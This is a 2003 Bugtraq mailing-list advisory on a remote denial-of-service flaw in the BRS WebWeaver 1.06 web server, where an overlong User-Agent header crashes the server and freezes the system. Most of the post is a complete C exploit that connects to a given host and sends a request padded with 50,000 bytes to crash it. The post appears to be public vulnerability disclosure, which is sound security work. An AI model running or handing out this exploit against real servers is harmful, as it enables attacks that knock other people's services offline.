|
Bugtraq
mailing list archives
BRS WebWeaver 1.06 remote DoS vulnerability
From: d4rkgr3y <d4rk () securitylab ru>
Date: Sat, 1 Nov 2003 12:03:33 +0300
/**********************************************************
*
* m00 security advistory #004
*
* BRS WebWeaver remote DoS vulnerability
*
* www.m00security.org
*
************************************************************/
---------------------------------
Product: BRS WebWeaver
Version: 1.06 and bellow
OffSite: www.brswebweaver.com
---------------------------------
Overview:
BRS WebWeaver is an HTTP Server with support for
CGI, ISAPI, SSI, IP Address based security, Realm
based security, configurable users and groups, as well
as basic HTTP capabilities.
Problem description:
BRS WebWeaver httpd crashes and freeze the whole system,
when it get the request that contatins long string within
`User-Agent` field. The vulnarability doesn't seems
exploitable, except DoS.
Exploit:
Lame cpp exploit code that demonstrate possibility of
remote Denial-of-Service attack against BRS WebWeaver.
/*
* BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk () securitylab ru]
*
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#define port 80
main(int argc, char **argv) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd, i;
const c = 50000;
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");
if (argc!=2){
printf("usage\n %s hostname\n\n",argv[0]);
exit(1);
}
//memset((request+98),0x41,c);
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x63;
request[strlen(request)] = 0x74;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x3a;
request[strlen(request)] = 0x20;
request[strlen(request)] = 0x4b;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
request[strlen(request)] = 0x2d;
request[strlen(request)] = 0x41;
request[strlen(request)] = 0x6c;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x76;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x0a;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if ((hs=gethostbyname(argv[1]))==NULL) {
printf("damn");
exit(1);
}
printf("~ Host resolved.\n");
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("damn"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("damn"); exit(0);
}
printf("~ Socket connected\n");
printf("~ Sending evil code... ");
write(sockfd,request,strlen(request));
printf("done\n\n");
close(sockfd);
}
/* m00 */
(c) m00 Security / d4rkgr3y [d4rk () securitylab ru]
 By Date 
By Thread
Current thread:
- BRS WebWeaver 1.06 remote DoS vulnerability d4rkgr3y (Nov 01)
|
Intro
